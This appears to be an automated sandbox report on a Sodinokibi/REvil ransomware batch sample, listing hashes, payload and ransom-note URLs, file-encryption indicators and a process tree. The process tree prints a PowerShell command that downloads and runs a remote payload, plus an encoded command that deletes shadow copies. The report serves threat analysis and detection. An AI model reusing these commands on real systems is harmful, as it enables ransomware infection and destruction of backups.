Analysis
-
max time kernel
122s -
max time network
148s -
platform
windows7_x64 -
resource
win7 -
submitted
14-08-2020 13:10
Static task
static1
Behavioral task
behavioral1
Sample
02e935713bd82b8d92596478da846147.bat
Resource
win7
Behavioral task
behavioral2
Sample
02e935713bd82b8d92596478da846147.bat
Resource
win10
General
-
Target
02e935713bd82b8d92596478da846147.bat
-
Size
222B
-
MD5
709373b57a3c4758065b1f72f1a19b2d
-
SHA1
b820438ee7bcc43e84373b68f9fec3bedc10c25a
-
SHA256
ab2207ca32e7d0e2434060e8a2d6cb8bf247c9d3174fe86c5c06fb0100c31838
-
SHA512
d5061ac40ed9258dcb412dcf5eb05fe716affcd44a388b81b9b89e29317f51138fc8e7a13d1f195a5d3647736aea67c66a1d73fb4cff70406851cd2c29f1816f
Malware Config
Extracted
http://185.103.242.78/pastes/02e935713bd82b8d92596478da846147
Extracted
C:\3o0686-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3A852CC17EF37947
http://decryptor.cc/3A852CC17EF37947
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 61 IoCs
Processes:
powershell.exeflow pid process 4 1072 powershell.exe 6 1072 powershell.exe 11 1072 powershell.exe 12 1072 powershell.exe 14 1072 powershell.exe 15 1072 powershell.exe 17 1072 powershell.exe 19 1072 powershell.exe 21 1072 powershell.exe 22 1072 powershell.exe 24 1072 powershell.exe 26 1072 powershell.exe 27 1072 powershell.exe 29 1072 powershell.exe 30 1072 powershell.exe 32 1072 powershell.exe 33 1072 powershell.exe 35 1072 powershell.exe 37 1072 powershell.exe 38 1072 powershell.exe 42 1072 powershell.exe 44 1072 powershell.exe 45 1072 powershell.exe 46 1072 powershell.exe 49 1072 powershell.exe 51 1072 powershell.exe 52 1072 powershell.exe 54 1072 powershell.exe 56 1072 powershell.exe 58 1072 powershell.exe 59 1072 powershell.exe 61 1072 powershell.exe 63 1072 powershell.exe 64 1072 powershell.exe 66 1072 powershell.exe 68 1072 powershell.exe 70 1072 powershell.exe 72 1072 powershell.exe 75 1072 powershell.exe 76 1072 powershell.exe 78 1072 powershell.exe 80 1072 powershell.exe 81 1072 powershell.exe 83 1072 powershell.exe 85 1072 powershell.exe 87 1072 powershell.exe 89 1072 powershell.exe 90 1072 powershell.exe 92 1072 powershell.exe 94 1072 powershell.exe 95 1072 powershell.exe 97 1072 powershell.exe 99 1072 powershell.exe 101 1072 powershell.exe 102 1072 powershell.exe 104 1072 powershell.exe 105 1072 powershell.exe 107 1072 powershell.exe 109 1072 powershell.exe 111 1072 powershell.exe 113 1072 powershell.exe -
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\UnprotectSwitch.tiff powershell.exe File renamed C:\Users\Admin\Pictures\ConvertFromStop.raw => \??\c:\users\admin\pictures\ConvertFromStop.raw.3o0686 powershell.exe File renamed C:\Users\Admin\Pictures\InstallDisable.raw => \??\c:\users\admin\pictures\InstallDisable.raw.3o0686 powershell.exe File renamed C:\Users\Admin\Pictures\RevokeSubmit.crw => \??\c:\users\admin\pictures\RevokeSubmit.crw.3o0686 powershell.exe File renamed C:\Users\Admin\Pictures\SkipRemove.png => \??\c:\users\admin\pictures\SkipRemove.png.3o0686 powershell.exe File renamed C:\Users\Admin\Pictures\UnprotectSwitch.tiff => \??\c:\users\admin\pictures\UnprotectSwitch.tiff.3o0686 powershell.exe -
Enumerates connected drives 3 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2756p6c2gi.bmp" powershell.exe -
Drops file in Program Files directory 38 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\OptimizeFormat.mht powershell.exe File opened for modification \??\c:\program files\SaveDisable.potm powershell.exe File opened for modification \??\c:\program files\UpdateTrace.mp2 powershell.exe File opened for modification \??\c:\program files\AssertWait.bmp powershell.exe File opened for modification \??\c:\program files\GetResize.tif powershell.exe File opened for modification \??\c:\program files\MountImport.001 powershell.exe File opened for modification \??\c:\program files\SelectConvertFrom.ogg powershell.exe File opened for modification \??\c:\program files\UseLock.pcx powershell.exe File opened for modification \??\c:\program files\ConvertFromDisable.css powershell.exe File opened for modification \??\c:\program files\UseStart.mpg powershell.exe File opened for modification \??\c:\program files\BackupWatch.xps powershell.exe File opened for modification \??\c:\program files\DenyCompare.aif powershell.exe File opened for modification \??\c:\program files\DenyRegister.rtf powershell.exe File opened for modification \??\c:\program files\EnterEdit.htm powershell.exe File opened for modification \??\c:\program files\InvokeReceive.gif powershell.exe File created \??\c:\program files\microsoft sql server compact edition\3o0686-readme.txt powershell.exe File opened for modification \??\c:\program files\MountPop.aiff powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\3o0686-readme.txt powershell.exe File created \??\c:\program files (x86)\3o0686-readme.txt powershell.exe File opened for modification \??\c:\program files\ResolveCompare.temp powershell.exe File opened for modification \??\c:\program files\RegisterRemove.wmx powershell.exe File opened for modification \??\c:\program files\BackupConnect.midi powershell.exe File opened for modification \??\c:\program files\DebugEnter.mp3 powershell.exe File opened for modification \??\c:\program files\DisableBlock.m1v powershell.exe File opened for modification \??\c:\program files\EnableRead.jpeg powershell.exe File opened for modification \??\c:\program files\FindRead.aifc powershell.exe File opened for modification \??\c:\program files\GroupSubmit.edrwx powershell.exe File opened for modification \??\c:\program files\TraceUnblock.vsw powershell.exe File created \??\c:\program files\3o0686-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\3o0686-readme.txt powershell.exe File opened for modification \??\c:\program files\EnterResize.M2T powershell.exe File opened for modification \??\c:\program files\ExitJoin.png powershell.exe File opened for modification \??\c:\program files\ProtectUse.eprtx powershell.exe File opened for modification \??\c:\program files\CopyRepair.zip powershell.exe File opened for modification \??\c:\program files\SaveRevoke.ex_ powershell.exe File opened for modification \??\c:\program files\UpdateUnprotect.m4a powershell.exe File opened for modification \??\c:\program files\WriteExport.odp powershell.exe File opened for modification \??\c:\program files\GroupConvert.ADT powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1072 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1072 powershell.exe 1072 powershell.exe 1072 powershell.exe 1940 powershell.exe 1940 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1072 powershell.exe Token: SeDebugPrivilege 1072 powershell.exe Token: SeDebugPrivilege 1940 powershell.exe Token: SeBackupPrivilege 1560 vssvc.exe Token: SeRestorePrivilege 1560 vssvc.exe Token: SeAuditPrivilege 1560 vssvc.exe Token: SeTakeOwnershipPrivilege 1072 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1612 wrote to memory of 1072 1612 cmd.exe powershell.exe PID 1612 wrote to memory of 1072 1612 cmd.exe powershell.exe PID 1612 wrote to memory of 1072 1612 cmd.exe powershell.exe PID 1612 wrote to memory of 1072 1612 cmd.exe powershell.exe PID 1072 wrote to memory of 1940 1072 powershell.exe powershell.exe PID 1072 wrote to memory of 1940 1072 powershell.exe powershell.exe PID 1072 wrote to memory of 1940 1072 powershell.exe powershell.exe PID 1072 wrote to memory of 1940 1072 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\02e935713bd82b8d92596478da846147.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/02e935713bd82b8d92596478da846147');Invoke-WIWBLXHVRXNAAOB;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1560